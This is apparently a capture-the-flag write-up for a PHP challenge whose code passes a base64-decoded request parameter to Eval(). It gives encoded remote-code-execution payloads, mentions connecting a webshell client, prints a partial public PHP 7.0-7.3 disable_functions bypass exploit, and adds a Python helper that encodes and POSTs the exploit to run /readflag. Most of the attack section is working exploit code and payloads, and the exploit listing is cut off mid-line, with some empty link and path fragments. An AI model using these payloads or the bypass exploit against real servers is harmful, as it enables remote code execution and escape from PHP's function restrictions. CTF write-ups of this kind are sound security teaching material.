Key points: code audit, bypassing disable_functions
The challenge provides the source:
```php
<title>Check_In</title>
<?php
highlight_file(__FILE__);
class ClassName
{
    public $code = null;
    public $decode = null;

    function __construct()
    {
        // user-controlled input straight from $_REQUEST (GET, POST or cookie)
        $this->code   = @$this->x()['Ginkgo'];
        // base64 is the only "transformation" before the sink
        $this->decode = @base64_decode($this->code);
        // sink: arbitrary PHP execution
        @Eval($this->decode);
    }

    public function x()
    {
        return $_REQUEST;
    }
}
new ClassName();
```
In __construct(), the Ginkgo parameter is taken from $_REQUEST, run through base64_decode() and handed to Eval(), so whatever PHP we want to run has to be base64-encoded first. For RCE:
phpinfo();  ->  cGhwaW5mbygpOw==
which returns the phpinfo() page.
The disable_functions entry shows that a lot of functions are disabled.
First, enumerate the directory tree. Payload:
?Ginkgo=dmFyX2R1bXAoc2NhbmRpcignLi4vLi4vLi4vLi4vJykpOw==
dmFyX2R1bXAoc2NhbmRpcignLi4vLi4vLi4vLi4vJykpOw== is the base64 encoding of var_dump(scandir('../../../../')); and the listing it returns contains a readflag file. Connect with AntSword (why did I even bother scanning directories?):
Picking the base64 encoder may not work; I got stuck here before. The official writeup provides a hand-written encoder:
With that encoder selected, the connection succeeds:
As expected, commands cannot be executed. So it comes down to bypassing disable_functions, and there is a ready-made exploit for that:
Link: .php
Usage:
```php
<?php
# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
#
# Bug: .php?id=72530
#
# This exploit should work on all PHP 7.0-7.3 versions
#
# Author:

pwn("echo `/readflag` > /"); // run /readflag and write its output to

function pwn($cmd) {
    global $abc, $helper;

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                # handle pie
                $data_addr = $e_type == 2 ? $p_vaddr :
                # (the rest of the PoC is cut off on this page; use the full file from the link above)
```
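The two steps above, base64-encoding PHP for the Ginkgo sink and then pushing the stand-alone PoC through that same sink, as one added Python helper. This is example code written for this page, not part of the original writeup and not the PoC author's code. TARGET_URL is an assumption (the writeup never gives the challenge URL), and the PoC text is whatever you paste in from the linked file. Two details the helper takes care of that are easy to get wrong by hand: the base64 alphabet contains '+', '/' and '=', so the value must be percent-encoded (a raw '+' in a query string reaches PHP as a space, which the non-strict base64_decode() silently drops, corrupting everything after it), and code fed to Eval() must not start with an opening `<?php` tag.

```python
"""Payload helper for a base64_decode() -> Eval() sink (constructed example)."""
import base64
import re
import urllib.parse
import urllib.request

# Assumed target; the writeup does not give the challenge URL.
TARGET_URL = "http://127.0.0.1/index.php"


def encode_payload(php_code: str) -> str:
    """Base64 the snippet the way base64_decode() on the target expects it."""
    return base64.b64encode(php_code.encode()).decode()


def build_query(php_code: str) -> str:
    """Query/body string for the Ginkgo parameter.

    urlencode() percent-encodes '+', '/' and '=' from the base64 alphabet,
    so the exact base64 text survives the trip through the web server.
    """
    return urllib.parse.urlencode({"Ginkgo": encode_payload(php_code)})


def php_single_quoted(s: str) -> str:
    """PHP single-quoted literal; only backslash and quote need escaping."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def wrap_exploit_for_eval(poc_source: str, cmd: str) -> str:
    """Turn the stand-alone PoC file into code that can go through Eval().

    - strip the leading '<?php' tag: Eval() already starts in PHP mode, so
      the tag would be a parse error;
    - replace the first pwn("...") call with the command we actually want.
    """
    code = re.sub(r"^\s*<\?php\s*", "", poc_source)
    return re.sub(r'pwn\("[^"]*"\);',
                  lambda _m: "pwn(" + php_single_quoted(cmd) + ");",
                  code, count=1)


def send(php_code: str, url: str = TARGET_URL, timeout: float = 10.0) -> str:
    """POST the payload: $_REQUEST reads POST fields too, and a POST body
    has no URL-length limit, which matters for a several-KB PoC."""
    body = build_query(php_code).encode()
    req = urllib.request.Request(url, data=body, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Recon payloads from the writeup (offline: just print the encoded form).
    print(build_query("phpinfo();"))
    print(build_query("var_dump(scandir('../../../../'));"))
    # Live usage against the assumed URL: list the blocked functions, then
    # push the PoC through the same sink with /readflag as the command.
    # print(send("echo ini_get('disable_functions');"))
    # with open("exploit.php") as f:
    #     print(send(wrap_exploit_for_eval(f.read(), "/readflag")))
```

The `send()` call goes through POST rather than GET because the PoC is several kilobytes once base64-encoded and `$_REQUEST` picks up POST fields just as well; the sample output of `wrap_exploit_for_eval()` is what you would base64 and submit in place of the author's `pwn("echo `/readflag` > /...")` edit.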
Published: 2024-02-03 06:08:22
Original link: https://www.4u4v.net/it/170691170049141.html